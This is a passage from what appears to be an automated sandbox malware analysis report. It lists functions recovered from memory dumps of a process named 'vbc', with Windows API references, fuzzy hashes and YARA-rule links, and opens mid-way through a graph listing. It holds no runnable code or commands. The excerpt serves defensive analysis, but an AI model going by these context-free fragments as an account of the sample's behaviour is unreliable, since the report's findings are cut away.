f493c2-f493d0 call f4adf0 6585->6589 6586->6585 6588 f49371 6586->6588 6587->6537 6590 f494be 6587->6590 6591 f49377 6588->6591 6592 f48dc9-f48dd9 6588->6592 6599 f493d5 6589->6599 6590->6537 6596 f494c4 6590->6596 6597 f48f44-f48f51 6591->6597 6598 f4937d 6591->6598 6594 f48db7-f48dbb 6592->6594 6595 f48ddb 6592->6595 6604 f48bd4-f48bdd 6594->6604 6605 f48dc1 6594->6605 6595->6594 6601 f48ddd-f48de1 6595->6601 6596->6546 6602 f48f57 6597->6602 6603 f4965d-f49662 6597->6603 6598->6585 6599->6514 6600 f493db 6599->6600 6600->6514 6607 f493e1 6600->6607 6608 f48ce6-f48cfe 6601->6608 6609 f48de7 6601->6609 6602->6603 6610 f48f5d-f48f7b 6602->6610 6603->6518 6620 f49668-f496e7 6603->6620 6605->6604 6606 f48dc7 6605->6606 6606->6592 6607->6574 6612 f48d00 6608->6612 6613 f48d4b-f48d67 6608->6613 6609->6608 6611 f48ded-f48dfe 6609->6611 6610->6518 6623 f48f81-f48f8c 6610->6623 6612->6613 6618 f48d02-f48d0e 6612->6618 6613->6592 6625 f48c8a-f48cb4 6613->6625 6630 f48d10-f48d4a 6618->6630 6631 f48cb9-f48cc8 6618->6631 6620->6526 6628 f496ed 6620->6628 6625->6631 6628->6526 6632 f496f3 6628->6632 6631->6613 6632->6613 6633 f496f9 6632->6633 6633->6512 6636 f496ff-f4970c 6633->6636 6636->6557
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e01a27af346859f09a36a256eaf8de3ad7ab9cd9ceb1603eb068fa0e65682ffc
                                                                                                                                                                      • Instruction ID: e10ba0c3961fa492310ac55da4761fbba1efaa23f22fb6b4c5bc5489770b1fba
                                                                                                                                                                      • Opcode Fuzzy Hash: e01a27af346859f09a36a256eaf8de3ad7ab9cd9ceb1603eb068fa0e65682ffc
                                                                                                                                                                      • Instruction Fuzzy Hash: CB31B462F0D3829FDB264B641C595773F619E93730B4E05CBDD818A0A3E6E84D09B362
                                                                                                                                                                      Function 00F4B97E Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 87bf29c4469b88936c091427a5cc63be206fa49c6d9b9dbcbc2fec80d6bed186
                                                                                                                                                                      • Instruction ID: 8e3f1dd2757870d541c476f3dd771ad290c40149ee00ff66d8eac1ccf9fa5e05
                                                                                                                                                                      • Opcode Fuzzy Hash: 87bf29c4469b88936c091427a5cc63be206fa49c6d9b9dbcbc2fec80d6bed186
                                                                                                                                                                      • Instruction Fuzzy Hash: C831C121C0C3819ADF369A2984983793FA0AB62331F4D44D9DDC58B157E728CC04F762
                                                                                                                                                                      Function 00F46490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ac11ad164c698359be961165d21d0a534022d8fec78340647d8f814f3fb54598
                                                                                                                                                                      • Instruction ID: b1842e4514939bddd1947bf68c4ab4b8d9eca47521d854bbc418b11b021cfbd4
                                                                                                                                                                      • Opcode Fuzzy Hash: ac11ad164c698359be961165d21d0a534022d8fec78340647d8f814f3fb54598
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D319061D087809BCF35DB28C444335BEA06BA7B74F48859ADC85CA2A2D6B98D48B753
                                                                                                                                                                      Function 070BF4C0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070BF564
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2669985021.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_70b0000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: dbeccbb1e440ce99f5ef2ad825e030d6aacc06ae2a9ce4ab3ef7df8abfd2a532
                                                                                                                                                                      • Instruction ID: ec1964f8183448edb6f45c33a0020b187e82af3aeda21287fe9ad4e69c212e3a
                                                                                                                                                                      • Opcode Fuzzy Hash: dbeccbb1e440ce99f5ef2ad825e030d6aacc06ae2a9ce4ab3ef7df8abfd2a532
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D3199B8D012599FCF14CFA9D980ADEFBB1FB49310F14942AE815B7210D735AA45CF54
                                                                                                                                                                      Function 00F4AE8F Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,0000004C), ref: 00F4B042
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 74eec8388118ea0c6b52f2e0407483d0f6435f9b52837dac0ade387d43ae7df4
                                                                                                                                                                      • Instruction ID: e0ee49bf8466848ae79395f8eb10cd83f264c82a7e044e9d53c3585ef87e6329
                                                                                                                                                                      • Opcode Fuzzy Hash: 74eec8388118ea0c6b52f2e0407483d0f6435f9b52837dac0ade387d43ae7df4
                                                                                                                                                                      • Instruction Fuzzy Hash: 06312F61D8D3C19FD7368B2988147677F605BA3331F0D458AE8958A1E3D2789D08E763
                                                                                                                                                                      Function 00F50106 Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: a9278130c121048de0ea45687cfb38a6164350fd03b3462f0f064007cbea1d16
                                                                                                                                                                      • Instruction ID: e932c2c95268267490033cda63ce31597203fc58cfbe90a592f21d68b7bcfe2d
                                                                                                                                                                      • Opcode Fuzzy Hash: a9278130c121048de0ea45687cfb38a6164350fd03b3462f0f064007cbea1d16
                                                                                                                                                                      • Instruction Fuzzy Hash: 33215C25D093415BDB364F2888547757FA07F52331F4D03AADE64CA1E6EA258D0CF662
                                                                                                                                                                      Function 09F1C3AC Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(?), ref: 09F1D6BA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 74e546c008cf8cf0d2e8b62bf23efd1b51a74dbd296603a8b6bd54e445a2f5d4
                                                                                                                                                                      • Instruction ID: cc4b17eeaf1415f632aed6d33d679f432d7a58e3bd208219d7444824cf00733f
                                                                                                                                                                      • Opcode Fuzzy Hash: 74e546c008cf8cf0d2e8b62bf23efd1b51a74dbd296603a8b6bd54e445a2f5d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C31AAB4D012499FCB14CFAAD884ADEFBF5EB49314F14906AE818B7360D334A945CFA4
                                                                                                                                                                      Function 00F4FBC6 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fb7ea9a2a92149bdc215ad818d6e2914b5d6b7efd128aa789b29b73cc8591988
                                                                                                                                                                      • Instruction ID: 4df9be2dfe3b97fe76e61db06c57ef25bab7ff86800e7fde6ca91389b88158ea
                                                                                                                                                                      • Opcode Fuzzy Hash: fb7ea9a2a92149bdc215ad818d6e2914b5d6b7efd128aa789b29b73cc8591988
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E21B134D087898FDB298E18C09463ABFA0BF91774F5848B9ED4D4A261D7348D4EB742
                                                                                                                                                                      Function 00F4B6FB Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: dc72eaa7cad9d6f175ed41f62ed7a08c3eea0282c80f4b4cd629aaf453f3e17d
                                                                                                                                                                      • Instruction ID: 091412adfc9a8c0a7db44332d0d97dea5d3476587ea84877626657eb6874950c
                                                                                                                                                                      • Opcode Fuzzy Hash: dc72eaa7cad9d6f175ed41f62ed7a08c3eea0282c80f4b4cd629aaf453f3e17d
                                                                                                                                                                      • Instruction Fuzzy Hash: 23217121D0C3846ACF368A288C54775BFA89BA2374F4D408AEC90862A7D379CD04F762
                                                                                                                                                                      Function 00F4BB0A Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 3fbf9660bd707454e24f3d31928af1fc381ea1d942e73c690010abf11ea828c7
                                                                                                                                                                      • Instruction ID: 9dc75d08423d5073264e2e8dddd13949ad2e98fcbcf93dc9b68fe79cb7906a75
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fbf9660bd707454e24f3d31928af1fc381ea1d942e73c690010abf11ea828c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6521A161C0D7414FDB265E3988992753FA0AB62331F49459ADD80CA167E728CC05BB52
                                                                                                                                                                      Function 00F4F6D1 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4F6E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 1cba29fd25db952e43673c313fcce072412cc756ed8c462d05c25f2761ff4269
                                                                                                                                                                      • Instruction ID: 355d039d88271ac1d7bc024db183a42c1150b7b7bf65e3536b5b8342151634bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cba29fd25db952e43673c313fcce072412cc756ed8c462d05c25f2761ff4269
                                                                                                                                                                      • Instruction Fuzzy Hash: 30219F65D0D3C25FDB324B1488546766FA07FA3734F4E46AADCA4850E3E6689C0CB312
                                                                                                                                                                      Function 00F4BE66 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 935beb9be1ea7728b73972e20dd7a0a746ede8f80c1c2e344ca367b1ab3febd4
                                                                                                                                                                      • Instruction ID: 6c6d9d22b217441b7eb501e3b331dc0c2b3820ebc25515f2bb9f84ea6a49f994
                                                                                                                                                                      • Opcode Fuzzy Hash: 935beb9be1ea7728b73972e20dd7a0a746ede8f80c1c2e344ca367b1ab3febd4
                                                                                                                                                                      • Instruction Fuzzy Hash: 83213721C4E3409BD7B682584D5877A7FA0AB61770F4C244DDC844B9A2D6A5AC06B3A3
                                                                                                                                                                      Function 00F4AD4D Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 038f3b6879a995de064d936d589c0d7a2b7ed9833ebd4d32dd9939c3d0bcac3f
                                                                                                                                                                      • Instruction ID: dd793026af93d38a1441f80178739ed27daba7ef1bc41f296d222d2cec4b64cf
                                                                                                                                                                      • Opcode Fuzzy Hash: 038f3b6879a995de064d936d589c0d7a2b7ed9833ebd4d32dd9939c3d0bcac3f
                                                                                                                                                                      • Instruction Fuzzy Hash: AF112366D8E3825FDB2A17645C453BA3F705F62331F4C15A2ED82854A3EA448C06B253
                                                                                                                                                                      Function 00F4ADB6 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: f2b4a235e06b263164734e0d39665d53f089e7e10f2ac264a28c8bf9afc276ab
                                                                                                                                                                      • Instruction ID: e69b32232031abedd38d1619a4e778234b82551a21d96d38d0d6e863dcc44432
                                                                                                                                                                      • Opcode Fuzzy Hash: f2b4a235e06b263164734e0d39665d53f089e7e10f2ac264a28c8bf9afc276ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E117C11D8E3C25FE767066868152763F745E23331F091493DC82CA8A3E6458C09B363
                                                                                                                                                                      Function 00F4E687 Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4E8D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: a69287a9640d5f6327c1b7379543b300b90b9d05c5caf2fe588bdf46a1eaba6c
                                                                                                                                                                      • Instruction ID: 8f99fca9d83f08831c52e4176086f9174029f0a92dbeca627ad4f6a20520edac
                                                                                                                                                                      • Opcode Fuzzy Hash: a69287a9640d5f6327c1b7379543b300b90b9d05c5caf2fe588bdf46a1eaba6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A012872D082419BDF308B088849ABA3F20FBA4B70F1C461EFC95821E1D2319C08B753
                                                                                                                                                                      Function 00F4E2F8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: 703d17691b7307e70f2b25997b32f1b3fcb8a4cb8797505cf654474dc3d83484
                                                                                                                                                                      • Instruction ID: 1dcb48a9d9681834de311f264824b61b88df4cbc8c7acf79fb6d27e02704759f
                                                                                                                                                                      • Opcode Fuzzy Hash: 703d17691b7307e70f2b25997b32f1b3fcb8a4cb8797505cf654474dc3d83484
                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0C838E4430466EB2099144C07ABA7D9CB7E0F75FC448A5FC8542091E7D9EE087523
                                                                                                                                                                      Function 00F4BD26 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 4e4fd54514973512f93265a61edde18862c82f0d621bb6a14100ced0b0be0415
                                                                                                                                                                      • Instruction ID: e76f0a02a90c15d51ee4890b01759445ccf6e737a6174d91f75c188ff59553b3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e4fd54514973512f93265a61edde18862c82f0d621bb6a14100ced0b0be0415
                                                                                                                                                                      • Instruction Fuzzy Hash: E201D262C0E3415ECB258F2988983747FA0AB62330F4D49CADEC48A1A7E324CC04BB52
                                                                                                                                                                      Function 00F46086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4608C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: b13e0412e8888e6e6b355afdb1a5a6be3d08ea1c8c8991775394c3ecf76f0cba
                                                                                                                                                                      • Instruction ID: f62eba5c49047b8f5b42727ff45058438ccb61b4170a3d9d3feb4d45e248eb28
                                                                                                                                                                      • Opcode Fuzzy Hash: b13e0412e8888e6e6b355afdb1a5a6be3d08ea1c8c8991775394c3ecf76f0cba
                                                                                                                                                                      • Instruction Fuzzy Hash: 09016DA1D0D7409FCB259B2884043767FB06F97B70F098A8AAD85DB1A3D6308C08BB53
                                                                                                                                                                      Function 00F4E7EF Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: c6af43f2f85737f6ed52366144c0663ce167c6942f7f6ca1091dfd0fcd1bc8ae
                                                                                                                                                                      • Instruction ID: 973d5856be2afc6d86483889751ae7535cce9c0b0948bb71347feb621388e322
                                                                                                                                                                      • Opcode Fuzzy Hash: c6af43f2f85737f6ed52366144c0663ce167c6942f7f6ca1091dfd0fcd1bc8ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 3CF0F630E493810FDF628A2888947787FA5BF56B20F5D0496EC40C71E1E925DC04F327
                                                                                                                                                                      Function 00F4B6E9 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: b81e6726e7147134c5d74f3e289a5222736921b2bcb811c31b0f5190a8d0d9be
                                                                                                                                                                      • Instruction ID: b720d42e05ff71231fddd29bc223a5106769c5b1385075e5754d6333c79243f1
                                                                                                                                                                      • Opcode Fuzzy Hash: b81e6726e7147134c5d74f3e289a5222736921b2bcb811c31b0f5190a8d0d9be
                                                                                                                                                                      • Instruction Fuzzy Hash: 75F03C72D0D3869FDB228F209C106757F68AB96730F09089AED408A1A3D324CD19F722
                                                                                                                                                                      Function 00F4BC55 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 35603b09a704741041ff778f85f582e6087e8fec906d7224514772899d4b8579
                                                                                                                                                                      • Instruction ID: 1f177e49a8a084a2d01d8957d0fe77fc11140831e30de39e6d3aa208fb73e1ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 35603b09a704741041ff778f85f582e6087e8fec906d7224514772899d4b8579
                                                                                                                                                                      • Instruction Fuzzy Hash: FD01C261C0D3819ED726DF2D842832B7FE05BA2334F49498DE9C086197D379C94DA793
                                                                                                                                                                      Function 00F4CF75 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 56bbaf3b29c88dc6c1b99d7b31f1087f21b7f7da1fe97c986e51aeb79dcd7c26
                                                                                                                                                                      • Instruction ID: 44c4f850ae16f973a5e01601b7ab34ce1d694cd806f4309cdb16fa041ec16eaf
                                                                                                                                                                      • Opcode Fuzzy Hash: 56bbaf3b29c88dc6c1b99d7b31f1087f21b7f7da1fe97c986e51aeb79dcd7c26
                                                                                                                                                                      • Instruction Fuzzy Hash: 80F08C21D0B2409FEB718A28C808A7D7FA96741374F8C6566EC60970B1E738CD05BBE2
                                                                                                                                                                      Function 00F4EE68 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 493af7f4ab494f1ccc7a1dd380d7c0188d1ade502655c4d8e2487eaf449b3dbd
                                                                                                                                                                      • Instruction ID: d12a1df10958b5618ecd60aa7bca07b2faea503528aa3477e09810e82329b7c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 493af7f4ab494f1ccc7a1dd380d7c0188d1ade502655c4d8e2487eaf449b3dbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 24F02732C08202E6DB318A58CC04B7A7E507790330F290B3BFE2D400E1E6755D0CB643
                                                                                                                                                                      Function 00F44B70 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 00F44B76
